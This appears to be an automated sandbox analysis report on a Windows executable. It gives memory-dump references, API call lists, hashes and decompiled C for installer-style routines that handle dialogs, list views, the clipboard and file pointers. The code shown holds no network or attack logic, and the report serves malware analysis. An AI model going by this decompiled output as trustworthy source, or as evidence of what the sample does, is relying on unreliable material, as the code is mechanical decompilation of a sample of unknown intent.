                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                    • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                                                                    • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                    • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004030E2(long _a4) {
                                                                                    				long _t2;
                                                                                    
                                                                                    				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                                                    				return _t2;
                                                                                    			}




                                                                                    0x004030f0
                                                                                    0x004030f6

                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,?), ref: 004030F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                    • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                    • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                    • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    C-Code - Quality: 95%
                                                                                    			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                    				struct HWND__* _v8;
                                                                                    				long _v12;
                                                                                    				struct tagRECT _v28;
                                                                                    				void* _v36;
                                                                                    				signed int _v40;
                                                                                    				int _v44;
                                                                                    				int _v48;
                                                                                    				signed int _v52;
                                                                                    				int _v56;
                                                                                    				void* _v60;
                                                                                    				void* _v68;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				long _t87;
                                                                                    				unsigned int _t92;
                                                                                    				int _t94;
                                                                                    				int _t95;
                                                                                    				void* _t101;
                                                                                    				intOrPtr _t123;
                                                                                    				struct HWND__* _t127;
                                                                                    				int _t149;
                                                                                    				int _t150;
                                                                                    				struct HWND__* _t154;
                                                                                    				struct HWND__* _t158;
                                                                                    				struct HMENU__* _t160;
                                                                                    				long _t162;
                                                                                    				void* _t163;
                                                                                    				short* _t164;
                                                                                    
                                                                                    				_t154 =  *0x42e404;
                                                                                    				_t149 = 0;
                                                                                    				_v8 = _t154;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					if(_a8 == 0x405) {
                                                                                    						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                    					}
                                                                                    					if(_a8 != 0x111) {
                                                                                    						L17:
                                                                                    						if(_a8 != 0x404) {
                                                                                    							L25:
                                                                                    							if(_a8 != 0x7b || _a12 != _t154) {
                                                                                    								goto L20;
                                                                                    							} else {
                                                                                    								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                                                    								_a8 = _t87;
                                                                                    								if(_t87 <= _t149) {
                                                                                    									L37:
                                                                                    									return 0;
                                                                                    								}
                                                                                    								_t160 = CreatePopupMenu();
                                                                                    								AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                                                    								_t92 = _a16;
                                                                                    								if(_t92 != 0xffffffff) {
                                                                                    									_t150 = _t92;
                                                                                    									_t94 = _t92 >> 0x10;
                                                                                    								} else {
                                                                                    									GetWindowRect(_t154,  &_v28);
                                                                                    									_t150 = _v28.left;
                                                                                    									_t94 = _v28.top;
                                                                                    								}
                                                                                    								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                                                    								_t162 = 1;
                                                                                    								if(_t95 == 1) {
                                                                                    									_v60 = _t149;
                                                                                    									_v48 = 0x42a0a0;
                                                                                    									_v44 = 0xfff;
                                                                                    									_a4 = _a8;
                                                                                    									do {
                                                                                    										_a4 = _a4 - 1;
                                                                                    										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                                                                                    									} while (_a4 != _t149);
                                                                                    									OpenClipboard(_t149);
                                                                                    									EmptyClipboard();
                                                                                    									_t101 = GlobalAlloc(0x42, _t162);
                                                                                    									_a4 = _t101;
                                                                                    									_t163 = GlobalLock(_t101);
                                                                                    									do {
                                                                                    										_v48 = _t163;
                                                                                    										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                                                    										 *_t164 = 0xa0d;
                                                                                    										_t163 = _t164 + 2;
                                                                                    										_t149 = _t149 + 1;
                                                                                    									} while (_t149 < _a8);
                                                                                    									GlobalUnlock(_a4);
                                                                                    									SetClipboardData(1, _a4);
                                                                                    									CloseClipboard();
                                                                                    								}
                                                                                    								goto L37;
                                                                                    							}
                                                                                    						}
                                                                                    						if( *0x42e3ec == _t149) {
                                                                                    							ShowWindow( *0x42ec28, 8);
                                                                                    							if( *0x42ecac == _t149) {
                                                                                    								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
                                                                                    							}
                                                                                    							E00403E5C(1);
                                                                                    							goto L25;
                                                                                    						}
                                                                                    						 *0x429468 = 2;
                                                                                    						E00403E5C(0x78);
                                                                                    						goto L20;
                                                                                    					} else {
                                                                                    						if(_a12 != 0x403) {
                                                                                    							L20:
                                                                                    							return E00403EEA(_a8, _a12, _a16);
                                                                                    						}
                                                                                    						ShowWindow( *0x42e3f0, _t149);
                                                                                    						ShowWindow(_t154, 8);
                                                                                    						E00403EB8(_t154);
                                                                                    						goto L17;
                                                                                    					}
                                                                                    				}
                                                                                    				_v52 = _v52 | 0xffffffff;
                                                                                    				_v40 = _v40 | 0xffffffff;
                                                                                    				_v60 = 2;
                                                                                    				_v56 = 0;
                                                                                    				_v48 = 0;
                                                                                    				_v44 = 0;
                                                                                    				asm("stosd");
                                                                                    				asm("stosd");
                                                                                    				_t123 =  *0x42ec30;
                                                                                    				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                                    				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                                    				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
                                                                                    				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
                                                                                    				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                                    				 *0x42e404 = _t127;
                                                                                    				_v8 = _t127;
                                                                                    				E00403EB8( *0x42e3f0);
                                                                                    				 *0x42e3f4 = E00404755(4);
                                                                                    				 *0x42e40c = 0;
                                                                                    				GetClientRect(_v8,  &_v28);
                                                                                    				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                                                    				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                                                    				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                    				if(_a8 >= 0) {
                                                                                    					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                                    					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                                    				}
                                                                                    				if(_a12 >= _t149) {
                                                                                    					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                                                    				}
                                                                                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                    				_push(0x1b);
                                                                                    				E00403E83(_a4);
                                                                                    				if(( *0x42ec38 & 0x00000003) != 0) {
                                                                                    					ShowWindow( *0x42e3f0, _t149);
                                                                                    					if(( *0x42ec38 & 0x00000002) != 0) {
                                                                                    						 *0x42e3f0 = _t149;
                                                                                    					} else {
                                                                                    						ShowWindow(_v8, 8);
                                                                                    					}
                                                                                    					E00403EB8( *0x42e3e8);
                                                                                    				}
                                                                                    				_t158 = GetDlgItem(_a4, 0x3ec);
                                                                                    				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                                                    				if(( *0x42ec38 & 0x00000004) != 0) {
                                                                                    					SendMessageA(_t158, 0x409, _t149, _a12);
                                                                                    					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                                                    				}
                                                                                    				goto L37;
                                                                                    			}
































                                                                                    0x00404ffa
                                                                                    0x00405000
                                                                                    0x00405009
                                                                                    0x0040500c
                                                                                    0x004051a4
                                                                                    0x004051c8
                                                                                    0x004051c8
                                                                                    0x004051db
                                                                                    0x004051f9
                                                                                    0x00405200
                                                                                    0x00405257
                                                                                    0x0040525b
                                                                                    0x00000000
                                                                                    0x00405262
                                                                                    0x0040526a
                                                                                    0x00405272
                                                                                    0x00405275
                                                                                    0x0040536e
                                                                                    0x00000000
                                                                                    0x0040536e
                                                                                    0x00405284
                                                                                    0x00405290
                                                                                    0x00405296
                                                                                    0x0040529c
                                                                                    0x004052b1
                                                                                    0x004052b7
                                                                                    0x0040529e
                                                                                    0x004052a3
                                                                                    0x004052a9
                                                                                    0x004052ac
                                                                                    0x004052ac
                                                                                    0x004052c7
                                                                                    0x004052cf
                                                                                    0x004052d2
                                                                                    0x004052db
                                                                                    0x004052de
                                                                                    0x004052e5
                                                                                    0x004052ec
                                                                                    0x004052f4
                                                                                    0x004052f4
                                                                                    0x0040530b
                                                                                    0x0040530b
                                                                                    0x00405312
                                                                                    0x00405318
                                                                                    0x00405321
                                                                                    0x00405328
                                                                                    0x00405331
                                                                                    0x00405333
                                                                                    0x00405336
                                                                                    0x00405345
                                                                                    0x00405347
                                                                                    0x0040534d
                                                                                    0x0040534e
                                                                                    0x0040534f
                                                                                    0x00405357
                                                                                    0x00405362
                                                                                    0x00405368
                                                                                    0x00405368
                                                                                    0x00000000
                                                                                    0x004052d2
                                                                                    0x0040525b
                                                                                    0x00405208
                                                                                    0x00405238
                                                                                    0x00405240
                                                                                    0x0040524b
                                                                                    0x0040524b
                                                                                    0x00405252
                                                                                    0x00000000
                                                                                    0x00405252
                                                                                    0x0040520c
                                                                                    0x00405216
                                                                                    0x00000000
                                                                                    0x004051dd
                                                                                    0x004051e3
                                                                                    0x0040521b
                                                                                    0x00000000
                                                                                    0x00405224
                                                                                    0x004051ec
                                                                                    0x004051f1
                                                                                    0x004051f4
                                                                                    0x00000000
                                                                                    0x004051f4
                                                                                    0x004051db
                                                                                    0x00405012
                                                                                    0x00405016
                                                                                    0x0040501f
                                                                                    0x00405026
                                                                                    0x00405029
                                                                                    0x0040502c
                                                                                    0x0040502f
                                                                                    0x00405030
                                                                                    0x00405031
                                                                                    0x0040504a
                                                                                    0x0040504d
                                                                                    0x00405057
                                                                                    0x00405066
                                                                                    0x0040506e
                                                                                    0x00405076
                                                                                    0x0040507b
                                                                                    0x0040507e
                                                                                    0x0040508a
                                                                                    0x00405093
                                                                                    0x0040509c
                                                                                    0x004050bf
                                                                                    0x004050c5
                                                                                    0x004050d6
                                                                                    0x004050db
                                                                                    0x004050e9
                                                                                    0x004050f7
                                                                                    0x004050f7
                                                                                    0x004050fc
                                                                                    0x0040510a
                                                                                    0x0040510a
                                                                                    0x0040510f
                                                                                    0x00405112
                                                                                    0x00405117
                                                                                    0x00405123
                                                                                    0x0040512c
                                                                                    0x00405139
                                                                                    0x00405148
                                                                                    0x0040513b
                                                                                    0x00405140
                                                                                    0x00405140
                                                                                    0x00405154
                                                                                    0x00405154
                                                                                    0x00405168
                                                                                    0x00405171
                                                                                    0x0040517a
                                                                                    0x0040518a
                                                                                    0x00405196
                                                                                    0x00405196
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00405050
                                                                                    • GetDlgItem.USER32 ref: 0040505F
                                                                                    • GetClientRect.USER32 ref: 0040509C
                                                                                    • GetSystemMetrics.USER32 ref: 004050A4
                                                                                    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                                                    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                                                    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405140
                                                                                    • GetDlgItem.USER32 ref: 00405161
                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                                                    • GetDlgItem.USER32 ref: 0040506E
                                                                                      • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                                                    • GetDlgItem.USER32 ref: 004051B3
                                                                                    • CreateThread.KERNEL32 ref: 004051C1
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                                                    • ShowWindow.USER32(00000000), ref: 004051EC
                                                                                    • ShowWindow.USER32(?,00000008), ref: 004051F1
                                                                                    • ShowWindow.USER32(00000008), ref: 00405238
                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040526A
                                                                                    • CreatePopupMenu.USER32 ref: 0040527B
                                                                                    • AppendMenuA.USER32 ref: 00405290
                                                                                    • GetWindowRect.USER32 ref: 004052A3
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405312
                                                                                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                                                                                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                                                    • GlobalLock.KERNEL32 ref: 0040532B
                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                                                    • SetClipboardData.USER32 ref: 00405362
                                                                                    • CloseClipboard.USER32 ref: 00405368
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: {
                                                                                    • API String ID: 590372296-366298937
                                                                                    • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                    • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                                                    • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                    • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 97%
                                                                                    			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                    				struct HWND__* _v8;
                                                                                    				struct HWND__* _v12;
                                                                                    				signed int _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				void* _v24;
                                                                                    				long _v28;
                                                                                    				int _v32;
                                                                                    				signed int _v40;
                                                                                    				int _v44;
                                                                                    				signed int* _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				signed int _v64;
                                                                                    				long _v68;
                                                                                    				void* _v72;
                                                                                    				intOrPtr _v76;
                                                                                    				intOrPtr _v80;
                                                                                    				void* _v84;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				struct HWND__* _t182;
                                                                                    				int _t196;
                                                                                    				long _t202;
                                                                                    				signed int _t206;
                                                                                    				signed int _t217;
                                                                                    				void* _t220;
                                                                                    				void* _t221;
                                                                                    				int _t227;
                                                                                    				signed int _t232;
                                                                                    				signed int _t233;
                                                                                    				signed int _t240;
                                                                                    				struct HBITMAP__* _t250;
                                                                                    				void* _t252;
                                                                                    				char* _t268;
                                                                                    				signed char _t269;
                                                                                    				long _t274;
                                                                                    				int _t280;
                                                                                    				signed int* _t281;
                                                                                    				int _t282;
                                                                                    				long _t283;
                                                                                    				int _t285;
                                                                                    				long _t286;
                                                                                    				signed int _t287;
                                                                                    				long _t288;
                                                                                    				signed int _t291;
                                                                                    				signed int _t298;
                                                                                    				signed int _t300;
                                                                                    				signed int _t302;
                                                                                    				int* _t310;
                                                                                    				void* _t311;
                                                                                    				int _t315;
                                                                                    				int _t316;
                                                                                    				int _t317;
                                                                                    				signed int _t318;
                                                                                    				void* _t320;
                                                                                    
                                                                                    				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                    				_t182 = GetDlgItem(_a4, 0x408);
                                                                                    				_t280 =  *0x42ec48;
                                                                                    				_t320 = SendMessageA;
                                                                                    				_v8 = _t182;
                                                                                    				_t315 = 0;
                                                                                    				_v32 = _t280;
                                                                                    				_v20 =  *0x42ec30 + 0x94;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					L23:
                                                                                    					if(_a8 != 0x405) {
                                                                                    						_t289 = _a16;
                                                                                    					} else {
                                                                                    						_a12 = _t315;
                                                                                    						_t289 = 1;
                                                                                    						_a8 = 0x40f;
                                                                                    						_a16 = 1;
                                                                                    					}
                                                                                    					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                    						_v16 = _t289;
                                                                                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                                    							if(( *0x42ec39 & 0x00000002) != 0) {
                                                                                    								L41:
                                                                                    								if(_v16 != _t315) {
                                                                                    									_t232 = _v16;
                                                                                    									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                    										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                    									}
                                                                                    									_t233 = _v16;
                                                                                    									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                    										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                    											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                                    										} else {
                                                                                    											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    								goto L48;
                                                                                    							}
                                                                                    							if(_a8 == 0x413) {
                                                                                    								L33:
                                                                                    								_t289 = 0 | _a8 != 0x00000413;
                                                                                    								_t240 = E00404782(_v8, _a8 != 0x413);
                                                                                    								if(_t240 >= _t315) {
                                                                                    									_t93 = _t280 + 8; // 0x8
                                                                                    									_t310 = _t240 * 0x418 + _t93;
                                                                                    									_t289 =  *_t310;
                                                                                    									if((_t289 & 0x00000010) == 0) {
                                                                                    										if((_t289 & 0x00000040) == 0) {
                                                                                    											_t298 = _t289 ^ 0x00000001;
                                                                                    										} else {
                                                                                    											_t300 = _t289 ^ 0x00000080;
                                                                                    											if(_t300 >= 0) {
                                                                                    												_t298 = _t300 & 0xfffffffe;
                                                                                    											} else {
                                                                                    												_t298 = _t300 | 0x00000001;
                                                                                    											}
                                                                                    										}
                                                                                    										 *_t310 = _t298;
                                                                                    										E0040117D(_t240);
                                                                                    										_t289 = 1;
                                                                                    										_a8 = 0x40f;
                                                                                    										_a12 = 1;
                                                                                    										_a16 =  !( *0x42ec38) >> 0x00000008 & 1;
                                                                                    									}
                                                                                    								}
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							_t289 = _a16;
                                                                                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							goto L33;
                                                                                    						} else {
                                                                                    							goto L48;
                                                                                    						}
                                                                                    					} else {
                                                                                    						L48:
                                                                                    						if(_a8 != 0x111) {
                                                                                    							L56:
                                                                                    							if(_a8 == 0x200) {
                                                                                    								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                    							}
                                                                                    							if(_a8 == 0x40b) {
                                                                                    								_t220 =  *0x42a07c;
                                                                                    								if(_t220 != _t315) {
                                                                                    									ImageList_Destroy(_t220);
                                                                                    								}
                                                                                    								_t221 =  *0x42a094;
                                                                                    								if(_t221 != _t315) {
                                                                                    									GlobalFree(_t221);
                                                                                    								}
                                                                                    								 *0x42a07c = _t315;
                                                                                    								 *0x42a094 = _t315;
                                                                                    								 *0x42ec80 = _t315;
                                                                                    							}
                                                                                    							if(_a8 != 0x40f) {
                                                                                    								L86:
                                                                                    								if(_a8 == 0x420 && ( *0x42ec39 & 0x00000001) != 0) {
                                                                                    									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                                    									ShowWindow(_v8, _t316);
                                                                                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                    								}
                                                                                    								goto L89;
                                                                                    							} else {
                                                                                    								E004011EF(_t289, _t315, _t315);
                                                                                    								if(_a12 != _t315) {
                                                                                    									E0040140B(8);
                                                                                    								}
                                                                                    								if(_a16 == _t315) {
                                                                                    									L73:
                                                                                    									E004011EF(_t289, _t315, _t315);
                                                                                    									_v32 =  *0x42a094;
                                                                                    									_t196 =  *0x42ec48;
                                                                                    									_v60 = 0xf030;
                                                                                    									_v16 = _t315;
                                                                                    									if( *0x42ec4c <= _t315) {
                                                                                    										L84:
                                                                                    										InvalidateRect(_v8, _t315, 1);
                                                                                    										if( *((intOrPtr*)( *0x42e3fc + 0x10)) != _t315) {
                                                                                    											E0040473D(0x3ff, 0xfffffffb, E00404755(5));
                                                                                    										}
                                                                                    										goto L86;
                                                                                    									}
                                                                                    									_t281 = _t196 + 8;
                                                                                    									do {
                                                                                    										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                    										if(_t202 != _t315) {
                                                                                    											_t291 =  *_t281;
                                                                                    											_v68 = _t202;
                                                                                    											_v72 = 8;
                                                                                    											if((_t291 & 0x00000001) != 0) {
                                                                                    												_v72 = 9;
                                                                                    												_v56 =  &(_t281[4]);
                                                                                    												_t281[0] = _t281[0] & 0x000000fe;
                                                                                    											}
                                                                                    											if((_t291 & 0x00000040) == 0) {
                                                                                    												_t206 = (_t291 & 0x00000001) + 1;
                                                                                    												if((_t291 & 0x00000010) != 0) {
                                                                                    													_t206 = _t206 + 3;
                                                                                    												}
                                                                                    											} else {
                                                                                    												_t206 = 3;
                                                                                    											}
                                                                                    											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                    											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                    											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                                    										}
                                                                                    										_v16 = _v16 + 1;
                                                                                    										_t281 =  &(_t281[0x106]);
                                                                                    									} while (_v16 <  *0x42ec4c);
                                                                                    									goto L84;
                                                                                    								} else {
                                                                                    									_t282 = E004012E2( *0x42a094);
                                                                                    									E00401299(_t282);
                                                                                    									_t217 = 0;
                                                                                    									_t289 = 0;
                                                                                    									if(_t282 <= _t315) {
                                                                                    										L72:
                                                                                    										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                    										_a16 = _t282;
                                                                                    										_a8 = 0x420;
                                                                                    										goto L73;
                                                                                    									} else {
                                                                                    										goto L69;
                                                                                    									}
                                                                                    									do {
                                                                                    										L69:
                                                                                    										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                                    											_t289 = _t289 + 1;
                                                                                    										}
                                                                                    										_t217 = _t217 + 1;
                                                                                    									} while (_t217 < _t282);
                                                                                    									goto L72;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                    							goto L89;
                                                                                    						} else {
                                                                                    							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                    							if(_t227 == 0xffffffff) {
                                                                                    								goto L89;
                                                                                    							}
                                                                                    							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                    							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                                    								_t283 = 0x20;
                                                                                    							}
                                                                                    							E00401299(_t283);
                                                                                    							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                    							_a12 = 1;
                                                                                    							_a16 = _t315;
                                                                                    							_a8 = 0x40f;
                                                                                    							goto L56;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					 *0x42ec80 = _a4;
                                                                                    					_t285 = 2;
                                                                                    					_v28 = 0;
                                                                                    					_v16 = _t285;
                                                                                    					 *0x42a094 = GlobalAlloc(0x40,  *0x42ec4c << 2);
                                                                                    					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
                                                                                    					 *0x42a088 =  *0x42a088 | 0xffffffff;
                                                                                    					_v24 = _t250;
                                                                                    					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
                                                                                    					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                    					 *0x42a07c = _t252;
                                                                                    					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                                    					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
                                                                                    					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                    						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                    					}
                                                                                    					DeleteObject(_v24);
                                                                                    					_t286 = 0;
                                                                                    					do {
                                                                                    						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                    						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                    							if(_t286 != 0x20) {
                                                                                    								_v16 = _t315;
                                                                                    							}
                                                                                    							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                                    						}
                                                                                    						_t286 = _t286 + 1;
                                                                                    					} while (_t286 < 0x21);
                                                                                    					_t317 = _a16;
                                                                                    					_t287 = _v16;
                                                                                    					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                    					_push(0x15);
                                                                                    					E00403E83(_a4);
                                                                                    					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                    					_push(0x16);
                                                                                    					E00403E83(_a4);
                                                                                    					_t318 = 0;
                                                                                    					_t288 = 0;
                                                                                    					if( *0x42ec4c <= 0) {
                                                                                    						L19:
                                                                                    						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                    						goto L20;
                                                                                    					} else {
                                                                                    						_t311 = _v32 + 8;
                                                                                    						_v24 = _t311;
                                                                                    						do {
                                                                                    							_t268 = _t311 + 0x10;
                                                                                    							if( *_t268 != 0) {
                                                                                    								_v60 = _t268;
                                                                                    								_t269 =  *_t311;
                                                                                    								_t302 = 0x20;
                                                                                    								_v84 = _t288;
                                                                                    								_v80 = 0xffff0002;
                                                                                    								_v76 = 0xd;
